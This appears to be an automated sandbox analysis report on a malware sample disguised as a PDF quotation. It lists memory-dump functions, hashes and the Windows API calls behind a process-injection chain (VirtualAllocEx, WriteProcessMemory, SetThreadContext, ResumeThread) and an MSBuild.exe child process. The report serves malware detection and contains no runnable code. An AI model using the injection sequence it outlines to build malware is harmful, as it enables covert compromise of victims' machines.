Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0d4c68c033ee3381734997022bb811d75d5519c25f25167db00312f4879c3529
Instruction ID: 62a86fc0ced20fc31666a9e29c4abfa9e902258294034ea2cf20343ac746a99d
Opcode Fuzzy Hash: 0d4c68c033ee3381734997022bb811d75d5519c25f25167db00312f4879c3529
Instruction Fuzzy Hash: A6E17070A08A8D8FDBB8DF28C8557E937E1FB59311F10512EE84EDB291DB749684CB81

Function 00007FFD9BC1CDC9 Relevance: 1.7, APIs: 1, Instructions: 210
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32 ref: 00007FFD9BC1CF30

Memory Dump Source

Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f0e66bb2d099cee037e4a3ecb03a097806175e86ced4a80e2b11386f1ede5af6
Instruction ID: 38af821f1fe509ad1009fc538c25ef1bfd6a82d246b3f52c2ba870cad368d087
Opcode Fuzzy Hash: f0e66bb2d099cee037e4a3ecb03a097806175e86ced4a80e2b11386f1ede5af6
Instruction Fuzzy Hash: 83611770908A1C8FDB98DF58C885BE9BBF1FB69311F1092AAD04DE3255DB74A985CF40

Function 00007FFD9BC1D6F9 Relevance: 1.7, APIs: 1, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE ref: 00007FFD9BC1D827

Memory Dump Source

Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e1b92582acec0d9f2eb55a089a81c572e51b29849f0b9b818e0f9cc1c4944dee
Instruction ID: 53bb56d3678ef0bde0f2622dfd1043d7a1aa6a4bda54c3bc995e567c22de46ac
Opcode Fuzzy Hash: e1b92582acec0d9f2eb55a089a81c572e51b29849f0b9b818e0f9cc1c4944dee
Instruction Fuzzy Hash: FD510670908A1C8FDB98DF58C895BEDBBF1FB69310F1091AAD44DE3251DB74A985CB40

Function 00007FFD9BC1CBB9 Relevance: 1.7, APIs: 1, Instructions: 184
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FFD9BC1CCE5

Memory Dump Source

Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a5dbc45ba7ceb4cff20fe73cd2167f49b689d92190d5b7fead9db7c9ff3ff0b9
Instruction ID: efcc41a89878f331af9427807bd5d29eb2e2fcc883b168d4feb73cd5cc98adc6
Opcode Fuzzy Hash: a5dbc45ba7ceb4cff20fe73cd2167f49b689d92190d5b7fead9db7c9ff3ff0b9
Instruction Fuzzy Hash: B951177090861C8FDF98DF58C845BE9BBB1FB69310F1092AAD44DE3251DB34A9858F40

Function 00007FFD9BC1C629 Relevance: 1.6, APIs: 1, Instructions: 150
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNEL32 ref: 00007FFD9BC1C704

Memory Dump Source

Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 57c2f675f3314169b93ff46608b7d39b098ebfd5513622dc15f74a22eba4f8b8
Instruction ID: da1298ea949e913fa80bde4e8213be45dbe66bbdfd74dfdb29b4090ae2ac8cfe
Opcode Fuzzy Hash: 57c2f675f3314169b93ff46608b7d39b098ebfd5513622dc15f74a22eba4f8b8
Instruction Fuzzy Hash: F2414A7090874C8FDB58DFA8C845AEDBBF1FB59311F1042AAD049E7252DB74A985CF40

Function 00007FFD9BC1D0E9 Relevance: 1.6, APIs: 1, Instructions: 135threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 00007FFD9BC1D1AF

Memory Dump Source

Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 94859b3c2c7a238a754904f799ea6f8a981aef11c7b7761262afd80c101021bc
Instruction ID: 27e7bfbbe36d8472f1038831a1f6e2bb545a0309f7e32ca6ceec6965bd4f8ea8
Opcode Fuzzy Hash: 94859b3c2c7a238a754904f799ea6f8a981aef11c7b7761262afd80c101021bc
Instruction Fuzzy Hash: 5C412970D0874C8FDF98DFA8D895AEDBBF0FB56310F10416AD409E7252DA74A586CB41

Function 00007FFD9B87951C Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

APIs

EnumCalendarInfoA.KERNEL32 ref: 00007FFD9B8795C7

Memory Dump Source

Source File: 00000000.00000002.2348138735.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID: CalendarEnumInfo
String ID:
API String ID: 2925833060-0
Opcode ID: 631818bc538820009a2d831ef416621a2652f23b79966a09d98611c458c6cdfd
Instruction ID: 94410337bcfcbaf77a5eec6ffb227dd0fa8f565c09c0c5f4e8088872e5c1d189
Opcode Fuzzy Hash: 631818bc538820009a2d831ef416621a2652f23b79966a09d98611c458c6cdfd
Instruction Fuzzy Hash: 88313A3190CA4C9FDB1CDB68984A6F87BF0EF56321F04426FD089D3192CB64A846C791

Function 00007FFD9B879430 Relevance: 1.6, APIs: 1, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 00007FFD9B8794E1

Memory Dump Source

Source File: 00000000.00000002.2348138735.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1d1677376d28bc98d565a6092e5a5769ccd0fb107b6ab7ff80390bc06096f654
Instruction ID: edfa5f3697c6b2c72c0f1d6ae703d8d30cd657c77f67ef81fc0765399da30662
Opcode Fuzzy Hash: 1d1677376d28bc98d565a6092e5a5769ccd0fb107b6ab7ff80390bc06096f654
Instruction Fuzzy Hash: 43310A3090CA4C8FDB1CDB9898466F97BF1EB5A321F14426FD049C32A2CB706852C791

Function 00007FFD9B87929D Relevance: 1.5, APIs: 1, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2348138735.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b017006f79f97bfee4e804c49c2fa6e4fc55123890cc941a8f9606738f8bed2a
Instruction ID: fc8d563886e639fc80c933b61b34a1022c07f969170f09f41bc7b4883aaf176f
Opcode Fuzzy Hash: b017006f79f97bfee4e804c49c2fa6e4fc55123890cc941a8f9606738f8bed2a
Instruction Fuzzy Hash: 0B515B32A0E68A5FE715DBAC9C6A5F87FE0EF56314F0540BFC09C831E3DA1569068781

Function 00007FFD9B8792DD Relevance: 1.4, APIs: 1, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FFD9B8793F7

Memory Dump Source

Source File: 00000000.00000002.2348138735.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b9fa19e3b22a0cae75160c650965f3f6e1bbd892d73845f8669c474b317c4b93
Instruction ID: af0d0e562d812720d5322452d50d12994f5cac959bce3f181ae58dd0655edcd1
Opcode Fuzzy Hash: b9fa19e3b22a0cae75160c650965f3f6e1bbd892d73845f8669c474b317c4b93
Instruction Fuzzy Hash: 23413B32A0E6895FDB15DBAC9C6A5F87FE0EF56314F0541BFC09D831A3DA116905C741

Function 00007FFD9BAE200D Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350760012.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bae0000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a88f0497c434044f4d9f6675542d58be6b299797c1af16daad0a551f07601f
Instruction ID: a5510636393f0d063dd5a87b187df12503abd2282600da788ffe1dcefa980b88
Opcode Fuzzy Hash: c6a88f0497c434044f4d9f6675542d58be6b299797c1af16daad0a551f07601f
Instruction Fuzzy Hash: 5212FC70E1A61E9FEBA4DFA8C4A57BC77B1FF59300F51007AD049D32A1CA796A81CB40

Function 00007FFD9B97088D Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e2be306d5146c62a4b9509de3051fafb8ef6de0730bafcb0e585c58e7f682d7
Instruction ID: 1731e571d9e5b4c4d73a85495aa25830c070bd9d542bc2dc143bc336ca8295b1
Opcode Fuzzy Hash: 7e2be306d5146c62a4b9509de3051fafb8ef6de0730bafcb0e585c58e7f682d7
Instruction Fuzzy Hash: 1F81B730A19A1D9FDFA4EFA8C865BADB7B1FF59305F5101AAD00DE32A5CB345980CB41

Function 00007FFD9B970558 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0789d949cfd270b6c419cbbdb34c03a58b92cd63922d5ac97091cb7b5f3477
Instruction ID: 733f4164b36ca69d415637c30488ad7c7fcaff5e191e095b889b9996466133b2
Opcode Fuzzy Hash: 5b0789d949cfd270b6c419cbbdb34c03a58b92cd63922d5ac97091cb7b5f3477
Instruction Fuzzy Hash: 9251F471E18B5D9FDB95EFA89855AED7BE0FF49310F0402BBD009D71A6CE2898428780

Function 00007FFD9B970590 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef863e7970d671e0408c570cfcb2d6df793b092582d01ef32d40913e4ba97796
Instruction ID: 7fbdf0b40685cdc0b2be74b7b5a4129fd365a8df7c08cbf1f9e8113309127dc5
Opcode Fuzzy Hash: ef863e7970d671e0408c570cfcb2d6df793b092582d01ef32d40913e4ba97796
Instruction Fuzzy Hash: EB41E270A19B8D9FDB91EFA8C451AED7BF0FF49310F0402BED049E72A5CA285842C750

Function 00007FFD9B973919 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2790e3d762a21c89952c9085642114503e4356e3cddf772c1258d33177300ac8
Instruction ID: e34a67ed6767f4126ff0d3ab2fac0fd7ccb06c1d6237c8f71985e794ee8409ab
Opcode Fuzzy Hash: 2790e3d762a21c89952c9085642114503e4356e3cddf772c1258d33177300ac8
Instruction Fuzzy Hash: 6D51C670E2A52D9EEBB4DB6488947B8B7F2EB94701F1141F9D04D932A2DA355B91CF00

Function 00007FFD9BAE1538 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350760012.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bae0000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08355f5697c2a264f3a16eac4823d952140d72615083a4ad1c04ce52ad1d6340
Instruction ID: ae00faf1ba4df8fe59a451dc2cbd15d15a14b373c8a31b28c74174d95db16771
Opcode Fuzzy Hash: 08355f5697c2a264f3a16eac4823d952140d72615083a4ad1c04ce52ad1d6340
Instruction Fuzzy Hash: 1831B571E0A66E4FDF61CFA488656E97BF0FF65300F0501BAD009D31A1DE786A85CB91

Function 00007FFD9B97597A Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5155438373e05bc96b1b6dc3460cfdfed26fc23c89ed6560ce7fc936289950d9
Instruction ID: 8f4dbf3cabf856d5367f3116ca36cbac51dbccacaf5f2a53e02cf94933b6650d
Opcode Fuzzy Hash: 5155438373e05bc96b1b6dc3460cfdfed26fc23c89ed6560ce7fc936289950d9
Instruction Fuzzy Hash: 3641FB30D0891D8FDBA8DF18CC94AEEB7F0EB64302F5041EA800EE72A5DA755A85CF41

Function 00007FFD9B970B20 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1639ca85f76eb2741aaf3dce8c12ad1f1b5251007425eacc444bf686efbeb1
Instruction ID: ea56024aafd62235cb4b4c68f16f14442b4e08728181cfe357ed5d2a0c01de77
Opcode Fuzzy Hash: 2a1639ca85f76eb2741aaf3dce8c12ad1f1b5251007425eacc444bf686efbeb1
Instruction Fuzzy Hash: 2F310731A0D66A8FEB19BBA8A4A55FD3BA0DF41328F0801BBD04DDA197DE685542C394

Function 00007FFD9B97096D Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880f3d75513097ea16e05c65c4204aa504e1d021a46f3a7b36080418b2875c84
Instruction ID: c4522895742ab4142566e2b60ac4aa7027a6c5d58794b682ac8b0fae36949b03
Opcode Fuzzy Hash: 880f3d75513097ea16e05c65c4204aa504e1d021a46f3a7b36080418b2875c84
Instruction Fuzzy Hash: 1C21E131A1D69EAFFB159BA4C8A52FD77E0EF01310F0501B6C4599B1A3DA3C264A8B51

Function 00007FFD9B970B60 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179f770305a59acfb1946f8e38babdb07172a5367aa1e4f729f62a56724da2c0
Instruction ID: a9774bbb40f0375d887ced30b90d8d49751b6a39711a29802f5c4d2ef5952c61
Opcode Fuzzy Hash: 179f770305a59acfb1946f8e38babdb07172a5367aa1e4f729f62a56724da2c0
Instruction Fuzzy Hash: 15212330A1C66DCFDB65EBA884646FE7BE0EF45318F0500BED409E7592CA385551C794

Function 00007FFD9B973A8B Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfb25081051b9e75aa60eddbb28eab46835fc37dd041de48bf8f8335603b300
Instruction ID: 4d4b5edb295d80e28ef7d69708ae836f0b7f12ac8116d78ed59b6d0bce8d466d
Opcode Fuzzy Hash: 6bfb25081051b9e75aa60eddbb28eab46835fc37dd041de48bf8f8335603b300
Instruction Fuzzy Hash: 1B31C670E1A52D9EEBA4EF64C8947A8B7B2EB94311F1001E9C04DA32A1DA355BD5CF00

Function 00007FFD9B970B70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0db01fcf782fa25033e9ad144336cde2578ac198a01be155ac2a16f938d92d6
Instruction ID: 3f5beb552122e5ce438a2f6eb485ba83c27655fb20fbf8f67c7e812b7a382270
Opcode Fuzzy Hash: c0db01fcf782fa25033e9ad144336cde2578ac198a01be155ac2a16f938d92d6
Instruction Fuzzy Hash: 08112130A1D6AD8FEB65EBA884602FE7BE0EF45318F0400BEC04DE71A6CA285940C795

Function 00007FFD9B9C9880 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a3a6fed6e6d0f51a0bd76139cf603e400f57b166d1d4dc7810b9d31ac5f2e2
Instruction ID: 841c972f9da079ec127c646453ba88ee408b0f701967b424f23da657408f390f
Opcode Fuzzy Hash: 61a3a6fed6e6d0f51a0bd76139cf603e400f57b166d1d4dc7810b9d31ac5f2e2
Instruction Fuzzy Hash: 2A01B230A2464DDFCB85EF58C885AE937E4FB58708F110565A85DD3264CB34EA60CB81

Function 00007FFD9B973B36 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed77b57bbcffa8e053a3d027538f4338dc28ad6adc6e812f21d251dc0f08a15
Instruction ID: 23d34d576488293fb75ea4debe540c54f746b82f7f06d60ca73e8a746db458bc
Opcode Fuzzy Hash: 8ed77b57bbcffa8e053a3d027538f4338dc28ad6adc6e812f21d251dc0f08a15
Instruction Fuzzy Hash: 13010870E1E12EDEEB749B6488947B873B2EB90305F1001B9C04D972A1EA395BD5CF40

Function 00007FFD9B970330 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ded7fb2e26156a06c2b22e5a49b115e109a47015d241f47cc3228a49c8f974
Instruction ID: b2d1b9dcb765bba6278f42cdb3f58b0d2fd162dadf96b43e8a4744512f3ccb70
Opcode Fuzzy Hash: 79ded7fb2e26156a06c2b22e5a49b115e109a47015d241f47cc3228a49c8f974
Instruction Fuzzy Hash: D0F0123091590D9FDF50EF68C4596EA77E1FF18305F004466E81CD3174DA34A6A0CB81

Non-executed Functions

Function 0000013750940386 Relevance: 2.3, Strings: 1, Instructions: 1069COMMON

Download Yara Rule

Strings

@, xrefs: 0000013750940441

Memory Dump Source

Source File: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013750870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13750870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: e1ceaed0c00466ed6a68a53a7a24a0733fce14a9337209d44de033dc517546c7
Instruction ID: ab4a1c8b3a89bb3bd055fd498beb592dcdc746e92b72d46d59fca6ded39b88cc
Opcode Fuzzy Hash: e1ceaed0c00466ed6a68a53a7a24a0733fce14a9337209d44de033dc517546c7
Instruction Fuzzy Hash: 66728971A18B488BDB7DDF28C8857E973E1FB98314F14461DD88AC72C5DB34EA428B41

Function 00007FFD9BC0068D Relevance: .9, Instructions: 937COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a37ebc55d4343c8b21bd04373c2349b04770599ad4a092b09155d735fdcbfc6
Instruction ID: 831a3e710acb9690636163a3056f5c3e6a59359d54d20e50e6be017af70d1c1d
Opcode Fuzzy Hash: 0a37ebc55d4343c8b21bd04373c2349b04770599ad4a092b09155d735fdcbfc6
Instruction Fuzzy Hash: 49627030719A498FDB94EB6CC469B69B7E1FF99300F1541BED08DC72A6DE34A841CB42

Function 000001375093EC9E Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013750870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13750870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34585cf7d29f1bbff5eafe66fe4a997eaade7cd22e6ec31958d292d012f6f732
Instruction ID: a38be51f736fa5c9e12f24f9c1471405bae73a85177f23f105b6fb82c5fefe0e
Opcode Fuzzy Hash: 34585cf7d29f1bbff5eafe66fe4a997eaade7cd22e6ec31958d292d012f6f732
Instruction Fuzzy Hash: 15E18770718A498BEB6D9F28D8997EDB7E5FB58701F00422DD84AC3285DF30EA058B81

Function 0000013750940E3A Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013750870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13750870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 019759738f5e6f7d1f431ae0332defeebdcd7842e8320c005976b8c5c029d71f
Instruction ID: 2bb174dd1e8ed6b02b6f2499636e70208d6359089dfdabf7b1a78d0265310425
Opcode Fuzzy Hash: 019759738f5e6f7d1f431ae0332defeebdcd7842e8320c005976b8c5c029d71f
Instruction Fuzzy Hash: DFA13171508A4C8FDB69EF28C889BEA77F5FB68315F10466EE44AC7161EB30D644CB80

Function 00007FFD9B970472 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2349014797.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b970000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82856b1ecc82acf26c3b57a6d74f841124bf766d957b026552624d56f8a308e5
Instruction ID: 3f7bb290bae5ae175974ab1e832049fd3d362d1e9381ce67a47d36e38db51e62
Opcode Fuzzy Hash: 82856b1ecc82acf26c3b57a6d74f841124bf766d957b026552624d56f8a308e5
Instruction Fuzzy Hash: 03717170A18A4D8FEBA8DF18C855BE977E0FF59310F10412AE84EC7291DB749985CB81

Analysis Process: MSBuild.exePID: 8188, Parent PID: 7404COMMON

Executed Functions

Function 00007FFD9B88C3ED Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 791767bafbc670e3b31cf0589c4235b845886c36d1c2653ea7eb01840d28013d
Instruction ID: 62a497e2fab26c08871557aa54976b19bb2331cbf5962cc6f1e1bcbc1508e59b
Opcode Fuzzy Hash: 791767bafbc670e3b31cf0589c4235b845886c36d1c2653ea7eb01840d28013d
Instruction Fuzzy Hash: 07A10970E09A1E8FEB94EF58C855BE9B6A1FF58310F1041A9D02DE32D9CB785985CF41

Function 00007FFD9B88BF8F Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610c017b90f2ae9c5c4972062afcde03dfd22771b5e25c8a9cfbdef14323a6d7
Instruction ID: 28c388c2d77f23589ba9c16cac6ef93b0231d99c5dd88a95bf44dc1ef3dcdc65
Opcode Fuzzy Hash: 610c017b90f2ae9c5c4972062afcde03dfd22771b5e25c8a9cfbdef14323a6d7
Instruction Fuzzy Hash: 19A10D70D09A5D9FDB54EFA88855BEDBBF0EF19301F1001A9D05DE72A2CA386981DF00

Function 00007FFD9B889B56 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c859a27d57df1daa38d0a0c4b7bcc27c25556e2be4c3058194065a50759e01d
Instruction ID: 9ef1ac2e5f4d90baedda24a508929ee0ff0e0579e455e12848e213e48ced00b0
Opcode Fuzzy Hash: 5c859a27d57df1daa38d0a0c4b7bcc27c25556e2be4c3058194065a50759e01d
